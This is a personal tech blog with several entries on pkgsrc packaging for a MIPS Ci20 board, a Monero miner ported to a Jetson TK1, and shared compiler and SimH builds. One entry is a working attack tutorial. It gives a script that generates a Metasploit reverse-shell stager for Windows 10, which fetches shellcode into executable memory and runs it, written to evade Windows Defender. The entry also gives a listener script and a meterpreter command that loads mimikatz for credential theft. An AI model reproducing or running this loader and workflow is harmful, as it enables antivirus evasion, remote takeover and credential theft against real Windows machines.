One might think why not just upgrade the existing Debian 7.5 to something newer like Debian 8 2016-02-02 Beta or Debian 8 2015-09-09  as described here https://elinux.org/CI20_Distros  or just elevate the existing 7.5 userland to TESTING or UNSTABLE as described here : Example with  gcc upgrade

Add debian testing repo to your apt sources by creating a file on /etc/apt/sources.list.d folder containing the line deb http://ftp.us.debian.org/debian testing main contrib non-free

Instruct debian to use testing sources on certain packages by creating a file on /etc/apt/preferences.d containing the following:

Package: *
Pin: release a=testing
Pin-Priority: 100Update apt database: sudo apt-get update

Install gcc from testing: sudo apt-get install -t testing gcc

I wanted to touch as little as possible the existing Debian 7.5 environment and the keep the development environment separated in /usr/pkg   and also I have bad experience with getting into dependency hell when experimenting with different repos stable/testing/unstable risking that the system will break.

PKGSRC comes to the rescue !

More to come, please apologize some hacks, workarounds (early packages have no man/info pages)

I got stuck on the /pkgsrc/lang/guile20  for a while before I got it to build properly…

Anyways … the collection feels like something made by Freak Brothers …

Anyways … feel free to use it, take it with a grain of salt ;)

x11vnc compiled from pkgsrc-Q3-2017 running

Running x11vnc like this and connection normally from the remote via TightVNC client

/usr/pkg/bin/x11vnc -xkb -noxrecord -noxfixes -noxdamage -display :0 -auth /var/run/lightdm/root/:0 -usepw

P.S  I have learned a LOT using pkgsrc on mipsel Ci20 btw … you should try it !

Decided to try and port some mining software that uses CUDA and cryptonight crypto (XMR) to the Nvidia Jetson TK1 development board that I have acquired recently to study.

This device has the following specificationsProcessor:

• • 32-bit variant quad-core ARM Cortex-A15 MPCore R3 + low power companion core
• GPU consisting of 192 ALUs using Kepler technology
• 28 nm HPM process
• Released in Q2 2014
• Power consumption: 8 watts

I have ported the xmrMiner (https://github.com/xmrMiner) onto this device (since it does not build without modifications to the code on the Jetson TK1)  as it can use only CUDA 6.5 since it is 32bit ARMv7 architecture and Nvidia dropped 32bit support for CUDA since then.

The port consisted of modifying the GPU assembler functions in cryptonight/cuda_cryptonight_core.cu   and some ARM declarations in sha2.c

Required version of cmake was compiled via pkgsrc-current on the Jetson (pkgsrc is awsome here) with no major issues.

I have created a git repo for this specific fork here

https://github.com/DoktorCranium/xmrMiner-tk1

Below is the GPU miner running  – benchmarking gave approx 15 H/sec

With a combination of xmrig ( https://github.com/xmrig/xmrig) you can get additional 12 – 15 H/sec from the Cortex ARM CPU, so overall  performance would be around 25 – 30 H/sec from both CUDA GPU and the CPU.

This was a nice introduction into CUDA programming and ARM porting that I have enjoyed very much over this weekend.

I have been using pkgsrc framework since I have first came to know and use NetBSD, which was around 2005.

There is some good documentation available here https://www.netbsd.org/docs/pkgsrc/creating.html and here https://wiki.netbsd.org/pkgsrc/intro_to_packaging/  I wanted to share some real-life example of creating such custom package (I have chosen CFEngine-3.11.0 which is not present in pkgsrc-current nor the pkgsrc-Q1-2018, the latest version there is cfengine-3.7.3 )

CFEngine is an open source configuration management system, written by Mark Burgess. Its primary function is to provide automated configuration and maintenance of large-scale computer systems, including the unified management of servers, desktops, consumer and industrial devices, embedded networked devices, mobile smartphones, and tablet computers.

I have created the below example on the Debian 7.5 mipsel Ci20 developer board.

1.1) Pre-requisites

• – Bootstrapped pkgsrc environment on the Ci20 (used a 16 Gb SDCard)
• – Basic knowledge of pkgsrc environment
• – Some free time and patience

1.2) Preparing the tools for custom packages build

Make sore you build and install the following packages

# cd /usr/pkgsrc/pkgtools/url2pkg
# /usr/pkg/bin/bmake install clean 

# cd /usr/pkgsrc/pkgtools/pkgdiff
# /usr/pkg/bin/bmake install clean

Next we create a WIP (work in progress) directory within the pkgsrc directory structure

# mkdir -p /usr/pkgsrc/wip/cfengine

We have decided to create the latest cfengine package available which is 3.11.0, so we take a note of the url download link and go to the new build directory and call url2pkg to initiate the package preperation

# cd /usr/pkgsrc/wip/cfengine
# /usr/pkg/bin/url2pkg https://cfengine-package-repos.s3.amazonaws.com/tarballs/cfengine-3.11.0.tar.gz

Once the script finishes it will open an editor and offer you to add customized options to the Makefile

I Save the edit and exit (vi :wq) you will get this message once the script finishes,

===> Overriding tools for cfengine-3.11.0
===> Extracting for cfengine-3.11.0
url2pkg> Adjusting the Makefile.

Remember to correct CATEGORIES, HOMEPAGE, COMMENT, and DESCR when you're done!

The final file structure of the skeleton cfengine pkgsrc looks as following:

root@mipsbox:/usr/pkgsrc/wip/cfengine# ls -al
total 24
drwxr-xr-x 3 root root 4096 Jan 18 20:50 .
drwxr-xr-x 10 root root 4096 Jan 18 20:47 ..
-rw-r--r-- 1 root root 0 Jan 18 20:47 DESCR
-rw-r--r-- 1 root root 392 Jan 18 20:50 Makefile
-rw-r--r-- 1 root root 18 Jan 18 20:47 PLIST
-rw-r--r-- 1 root root 367 Jan 18 20:49 distinfo
drwxr-xr-x 11 root root 4096 Jan 18 20:50 work

I have edited the Makefile in this way

# $NetBSD$

DISTNAME= cfengine-3.11.0
CATEGORIES= wip
MASTER_SITES= https://cfengine-package-repos.s3.amazonaws.com/tarballs/
MAINTAINER= INSERT_YOUR_MAIL_ADDRESS_HERE
HOMEPAGE= https://cfengine.com/product/community/
COMMENT= Tool for automating system administration
LICENSE= gnu-gpl-v3

GNU_CONFIGURE= yes
CONFIGURE_ARGS+= --with-postgresql${BUILDLINK_PREFIX.postgresql}

USE_LIBTOOL= yes

.include "../../databases/postgresql92-client/buildlink3.mk"
.include "../../databases/lmdb/buildlink3.mk"
.include "../../devel/pcre/buildlink3.mk"
.include "../../security/openssl/buildlink3.mk"
.include "../../textproc/libxml2/buildlink3.mk"
.include "../../mk/pthread.buildlink3.mk"
.include "../../mk/bsd.pkg.mk"

Since cfengine-3.11.0 server build depends on either mysql or postgresql I have included the configure option to build it with postresql support (more advanced way is to provide options variables where one could choose the mysql or postgresql options, but Im not gonna cover this here ) as well as lmdb, pcre, openssl and libxml.

Next we will try and actually build the above via bmake and see if we get any errors that need to be addressed

# cd /usr/pkgsrc/wip/cfengine 
# /usr/pkg/bin/bmake

Since I have quite a huge number of packages already pre-built on my Ci20  I won’t have to wait for long to get all the dependent packages to compile but the make ends with the following error :

DONE: Configuration done. Run make/gmake to build CFEngine Community.
=> Modifying libtool scripts to use pkgsrc libtool
=> Modifying libtool scripts to use pkgsrc depcomp
===> Building for cfengine-3.11.0
bmake: "/disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile" line 1099: Variable/Value missing from "export"
bmake: Fatal errors encountered -- cannot continue
bmake: stopped in /disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0
*** Error code 1

Stop.
bmake[1]: stopped in /usr/pkgsrc/wip/cfengine
*** Error code 1

Stop.
bmake: stopped in /usr/pkgsrc/wip/cfengine

In cases like this you need to create some patches that would fix/patch the original code. The error above indicates that there is a wrongly parsed environment variable in the generated Makefile. We can check on line 1099 of the generated Makefile in the following directory

# cat /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile | head -n 1099 | tail -n 1
export TAR_OPTIONS

So bmake environment does not like the TAR_OPTIONS variable defined, lets search for this string only

# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile 
TAR_OPTIONS = --owner=0 --group=0
export TAR_OPTIONS

The above Makefile gets generated by the configure script, which in fact calls automake at a certain stage which generates a Makefile.in from Makefile.am

# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.in
TAR_OPTIONS = --owner=0 --group=0
export TAR_OPTIONS
# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.am
TAR_OPTIONS = --owner=0 --group=0
export TAR_OPTIONS

So a quick workaround would be to first try remove the unnecessary variable name (on 2 lines) And prepare a diff that can be used to create a custom patch file. We will be using the pkgvi program to edit the following original file like so

# /usr/pkg/bin/pkgvi /disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am

Remove the 2 offending lines containing the TAR_OPTIONS variable and save (vi :wq)

pkgvi: File was modified. For a diff, type:
pkgdiff "/disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.am"

To produce a diff run the above command

# pkgdiff "/disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am"
$NetBSD$

--- /disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am.orig 2017-08-03 15:28:40.000000000 +0000
+++ /disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am
@@ -48,8 +48,6 @@ SUBDIRS = libcompat \
 
 
 # Hide the buildsystem's username, at least with GNU tar.
-TAR_OPTIONS = --owner=0 --group=0
-export TAR_OPTIONS
 
 
 EXTRA_DIST = ChangeLog INSTALL README.md LICENSE CFVERSION

The output should be saved to a patch file in the /usr/pkgsrc/wip/cfengine/patches directory

# mkdir -p  /usr/pkgsrc/wip/cfengine/patches 
# /usr/pkg/bin/pkgdiff "/disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am" > /usr/pkgsrc/wip/cfengine/patches/patch-Makefile.am

Once the patch file called patch-Makefile.am is in place we need to regenerate SHA1 chacksums for the distinfo meta file like so:

# cd /usr/pkgsrc/wip/cfengine
# /usr/pkg/bin/bmake distinfo

So lets try and build it one more time and check if the above patch fixes our “TAR” issue

# cd /usr/pkgsrc/wip/cfengine
# rm -rf /usr/pkgsrc/wip/cfengine/work
# bmake

Again the same error comes !  Magically we have the TAR_OPTIONS in Makefile.in but not in Makefile.am anymore.

# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.in
TAR_OPTIONS = --owner=0 --group=0
export TAR_OPTIONS
# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.am

I did not have time to investigate the automake voodoo, so we can use a little dirty hack to make sure we patch the generated Makefile.in once the configure script finishes. This is how I have done it – by adding the following line towards the end of the configure script and produced the below patch file

$NetBSD$

--- /usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0/configure.orig 2017-08-03 15:29:11.000000000 +0000
+++ /usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0/configure
@@ -24850,6 +24854,9 @@ if test -n "$ac_unrecognized_opts" && te
 $as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2;}
 fi
 
+#Added a small hack here to fix the TAR_ issue in Makefile.in
+sed -i '/TAR_/d' Makefile.in
+sed -i '/TAR_/d' Makefile 
 
 { $as_echo "$as_me:${as_lineno-$LINENO}: result: DONE: Configuration done. Run make/gmake to build CFEngine Community." >&5
 $as_echo "DONE: Configuration done. Run make/gmake to build CFEngine Community." >&6; }

Save it as follows

# cd /usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0
# /usr/pkg/bin/pkgvi /usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0/configure
pkgvi: File was modified. For a diff, type:
pkgdiff "work/cfengine-3.11.0/configure"
# /usr/pkg/bin/pkgdiff "/usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0/configure" > /usr/pkgsrc/wip/cfengine/patches/patch-configure

Rebuild the SHA1 checksums again

# cd /usr/pkgsrc/wip/cfengine
# /usr/pkg/bin/bmake distinfo

And run bmake again,  takes approx 30 minutes to build on the Ci20, but this time we are successful !

<.....cut....> 
Making all in unit
Making all in load
Making all in acceptance
Making all in 25_cf-execd
 CC cf-execd-rpl-functions.o
 CCLD cf-execd-test
 CC mock_package_manager.lo
 CCLD libmock_package_manager.la
 CCLD mock_package_manager
 CC no_fds.o
 CCLD no_fds
 CC xml_c14nize-xml-c14nize.o
 CCLD xml-c14nize
root@mipsbox:/usr/pkgsrc/wip/cfengine#

Next we run a test install

# cd /usr/pkgsrc/wip/cfengine

# /usr/pkg/bin/bmake stage-install CHECK_FILES=no

Check if the .destdir got populated,  following should be visible

<----cut---->
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/translatepath.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/edit_replace_string.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/app_baseline.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/packagesmatching.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/mustache_comments.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/varnet.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/exec_in_sequence.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/process_signalling.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/sort.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/strcmp.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/classmatch.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/isipinsubnet.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/rename.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/README.md
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-promises
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-net
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-runagent
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-key
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-upgrade
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-agent
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-execd
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-serverd
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-monitord
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/rpmvercmp
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/plugins
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/ppkeys
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/modules
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/inputs
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/outputs

Make sure you also update the /usr/pkgsrc/wip/cfengine/DESCR

Cfengine, or the "configuration engine" is a very high level language
for building expert systems which administrate and configure large
computer networks. Cfengine uses the idea of classes and a primitive
form of intelligence to define and automate the configuration of
large systems in the most economical way possible. Cfengine is
designed to be a part of computer immune system.

Cfengine 3 is operationally backwards compatible with Cfengine 2, but the
language is not. Cfengine 3 is not a drop-in replacement for Cfengine 2.

Once this is done we populate the PLIST inventory

# cd /usr/pkgsrc/wip/cfengine
# /usr/pkg/bin/bmake print-PLIST >PLIST

And finally run a proper install

# /usr/pkg/bin/bmake install

Congratulations, your first binary pkgsrc package will land in /usr/pkgsrc/packages/All/ and will get installed into /usr/pkg environment.

I have been keeping this journal for 7 years now and I guess this is a reason to add some  interesting stuff (lately I have been busy in the compiler world on various architectures and different developer boards)

Here is a short little exercise for this evening -> getting the latest mimikatz running on a Windows 10 machine (build 10.0.16299.192) with all latest updates and Windows Defender protecting.

Microsoft has gotten really good in detecting all sorts of techniques and even a good custom ps1 mimikatz script that I have used a lot in the past gets flagged now

This customized method does not work anymore https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/

So I have played a little with my other generator scripts and came up with the following which is always reliable, all that I had to do is make it produce 64bit PE32+ executable and load the listener for 64bit reverse shell.

Here are my scripts and steps :  (make sure you have the mingw-w64 )

ii binutils-mingw-w64-x86-64 2.26-3ubuntu1+6.6 amd64 Cross-binutils for Win64 (x64) using MinGW-w64
ii g++-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C++ compiler for MinGW-w64 targeting Win64
ii gcc-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C compiler for MinGW-w64 targeting Win64
ii mingw-w64-x86-64-dev 4.0.4-2 all Development files for MinGW-w64 targeting Win64

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************" 
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' if (nret == SOCKET_ERROR)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(10);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error lenght\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
strip payload.exe 
file=`ls -la payload.exe` ; echo '(+)' $file

This will generate a loader called payload.exe which you can execute on the Windows 10 lab machine (I have used runs admin to be able to inject latest 64bit mimikatz.exe to memory from the spawned reverse shell)

My listener on the attacking machine running Metasploit is as follows:

#!/bin/bash
clear
echo "***************************************************************"
echo "    X86-64 meterpreter reverse tcp listener loader             "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

So run the above script from your metasploit directory and execute the payload.exe on the test machine.

Once you get the reverse shell connected

Run getsystem to elevate to NT AUTHORITY/SYSTEM and execute latest 64bit mimikatz.exe

Mimikatz 2.1.1-20180127   https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180127

Download, extract and copy over the x64/mimikatz.exe to your metasploit root directory, then execute it via the following command

meterpreter > execute -H -i -c -f /home/user/metasploit-framework/mimikatz.exe -m -d calc.exe

You get the latest mimikatz running with all the new interesting  features added … DCShadow ….

Of course we can have some fun with DPAPI stuff in windows ( as described here https://github.com/gentilkiwi/mimikatz/wiki/howto-~-scheduled-tasks-credentials )

A short update here.

I would like to thank mips.com in bringing back the  Ci20 NAND images online. They were missing for some time. NAND images are back !

http://mipscreator.mips.com/CI20/images/default_NAND/Debian8_20160602/nand_2016_06_02.img

If somebody finds GCC 7.3.0 binaries for Ci20 mipsel Debian 8.4 (Linux ci20 3.18.3-ci20-1 #1 SMP PREEMPT Wed May 25 10:24:41 UTC 2016 mips GNU/Linux)
useful I’m sharing them here

https://45.76.81.249:8000/mipsel-gcc/

Here is a screenshot from the environment

P.S Gentoo Ci20 NAND image is flawed http://distfiles.gentoo.org/experimental/mips/desktop-ci20/
There seems to be some bug in the native GCC compiler which crashes randomly.

Remember when building new binaries via this compiler to set the appropriate Library paths

LIBRARY_PATH=/usr/lib/mipsel-linux-gnu
export LIBRAY_PATH

As well as proper symlinks  in /usr/bin

  gcc -> /usr/local/gcc-7.3.0/bin/gcc
  g++ -> /usr/local/gcc-7.3.0/bin/g++
  cpp -> /usr/local/gcc-7.3.0/bin/g++

I have updated and will keep posting new pkgsrc-current (as of 20.02.2018) packages for Debian8 Ci20 here

https://45.76.81.249:8000/pkgsrc/debian8-ci20/All/

I have flashed the Ci20 board with the latest Debian 8 NAND from Imagination as it is described here https://elinux.org/CI20_Distros

The process is not hard, all that is needed is to follow the instructions properly (the board is almost impossible to brick)

Once you have the Ci20 up with Debian8 you can use the binary pkgsrc packages I have made for the board available here: https://45.76.81.249:8000/pkgsrc/debian8-ci20/

You will need to get a decent version of SimH (since Debian8 ships with simh 3.8.1-5) I have used the version that comes with pkgsrc-current simh-4.0.0.20170406   https://github.com/simh/simh

Unfortunately simh-4.0.0.20170406 does not build properly via pkgsrc on the Ci20, so I had to build it manually and shuffle around a little with includes on the filesystem (binaries for the Ci20 mipsel are uploaded here -> https://45.76.81.249:8000/pkgsrc/debian8-ci20/simh/

Here is a list of the Debian packages I had to install to get the SimH to compile

2018-03-01 22:11:15 install libgles2-mesa:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:15 install libpcrecpp0:mipsel <none> 2:8.35-3.3+deb8u4
2018-03-01 22:11:17 install libsdl2-2.0-0:mipsel <none> 2.0.2+dfsg1-6
2018-03-01 22:11:18 install libxcb-randr0:mipsel <none> 1.10-3+b1
2018-03-01 22:11:19 install libasound2-dev:mipsel <none> 1.0.28-1
2018-03-01 22:11:19 install libavahi-common-dev:mipsel <none> 0.6.31-5
2018-03-01 22:11:19 install pkg-config:mipsel <none> 0.28-1
2018-03-01 22:11:20 install libdbus-1-dev:mipsel <none> 1.8.22-0+deb8u1
2018-03-01 22:11:20 install libavahi-client-dev:mipsel <none> 0.6.31-5
2018-03-01 22:11:21 install libdrm-dev:mipsel <none> 2.4.58-2
2018-03-01 22:11:21 install x11proto-dri2-dev:all <none> 2.8-2
2018-03-01 22:11:22 install x11proto-gl-dev:all <none> 1.4.17-1
2018-03-01 22:11:22 install x11proto-xext-dev:all <none> 7.3.0-1
2018-03-01 22:11:22 install libxext-dev:mipsel <none> 2:1.3.3-1
2018-03-01 22:11:23 install x11proto-xf86vidmode-dev:all <none> 2.3.1-2
2018-03-01 22:11:23 install libxxf86vm-dev:mipsel <none> 1:1.1.3-1+b1
2018-03-01 22:11:24 install x11proto-fixes-dev:all <none> 1:5.0-2
2018-03-01 22:11:24 install libxfixes-dev:mipsel <none> 1:5.0.1-2+deb8u1
2018-03-01 22:11:24 install x11proto-damage-dev:all <none> 1:1.2.1-2
2018-03-01 22:11:25 install libxdamage-dev:mipsel <none> 1:1.1.4-2+b1
2018-03-01 22:11:25 install libxcb-glx0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:25 install libxcb-dri2-0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:26 install libxcb-dri3-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:26 install libxcb-render0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:26 install libxcb-randr0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:26 install libxcb-shape0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:27 install libxcb-xfixes0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:27 install libxcb-sync-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:27 install libxcb-present-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:28 install libxshmfence-dev:mipsel <none> 1.1-4
2018-03-01 22:11:28 install libx11-xcb-dev:mipsel <none> 2:1.6.2-3+deb8u1
2018-03-01 22:11:28 install libwayland-dev:mipsel <none> 1.6.0-2
2018-03-01 22:11:29 install libegl1-mesa-dev:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:29 install mesa-common-dev:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:30 install libgl1-mesa-dev:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:30 install libgles2-mesa-dev:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:31 install libpcre3-dev:mipsel <none> 2:8.35-3.3+deb8u4
2018-03-01 22:11:32 install libglib2.0-dev:mipsel <none> 2.42.1-1+b1
2018-03-01 22:11:36 install libglu1-mesa-dev:mipsel <none> 9.0.0-2
2018-03-01 22:11:37 install libice-dev:mipsel <none> 2:1.0.9-1+b1
2018-03-01 22:11:37 install libpulse-dev:mipsel <none> 5.0-13
2018-03-01 22:11:37 install libudev-dev:mipsel <none> 215-17+deb8u7
2018-03-01 22:11:38 install x11proto-render-dev:all <none> 2:0.11.1-2
2018-03-01 22:11:38 install libxrender-dev:mipsel <none> 1:0.9.8-1+b1
2018-03-01 22:11:38 install libxcursor-dev:mipsel <none> 1:1.1.14-1+deb8u1
2018-03-01 22:11:39 install libxi-dev:mipsel <none> 2:1.7.4-1+deb8u1
2018-03-01 22:11:40 install x11proto-xinerama-dev:all <none> 1.2.1-2
2018-03-01 22:11:40 install libxinerama-dev:mipsel <none> 2:1.1.3-1+b1
2018-03-01 22:11:40 install libxkbcommon-dev:mipsel <none> 0.4.3-2
2018-03-01 22:11:41 install x11proto-randr-dev:all <none> 1.4.0-2
2018-03-01 22:11:41 install libxrandr-dev:mipsel <none> 2:1.4.2-1+deb8u1
2018-03-01 22:11:41 install x11proto-scrnsaver-dev:all <none> 1.2.2-1
2018-03-01 22:11:42 install libxss-dev:mipsel <none> 1:1.2.2-1
2018-03-01 22:11:42 install libsm-dev:mipsel <none> 2:1.2.2-1+b1
2018-03-01 22:11:42 install libxt-dev:mipsel <none> 1:1.1.4-1+b1
2018-03-01 22:11:44 install x11proto-video-dev:all <none> 2.3.2-1
2018-03-01 22:11:44 install libxv-dev:mipsel <none> 2:1.0.10-1+deb8u1
2018-03-01 22:11:44 install libsdl2-dev:mipsel <none> 2.0.2+dfsg1-6

Just to give you an example here are the library locations for the vax binary

 libSDL2-2.0.so.0 => /usr/lib/libSDL2-2.0.so.0 (0x77dc7000)
 libm.so.6 => /lib/mipsel-linux-gnu/libm.so.6 (0x77d19000)
 librt.so.1 => /lib/mipsel-linux-gnu/librt.so.1 (0x77d01000)
 libpthread.so.0 => /lib/mipsel-linux-gnu/libpthread.so.0 (0x77cd6000)
 libpcreposix.so.3 => /usr/lib/libpcreposix.so.3 (0x77cc2000)
 libdl.so.2 => /lib/mipsel-linux-gnu/libdl.so.2 (0x77caf000)
 libvdeplug.so.2 => /usr/lib/libvdeplug.so.2 (0x77c99000)
 libc.so.6 => /lib/mipsel-linux-gnu/libc.so.6 (0x77b16000)
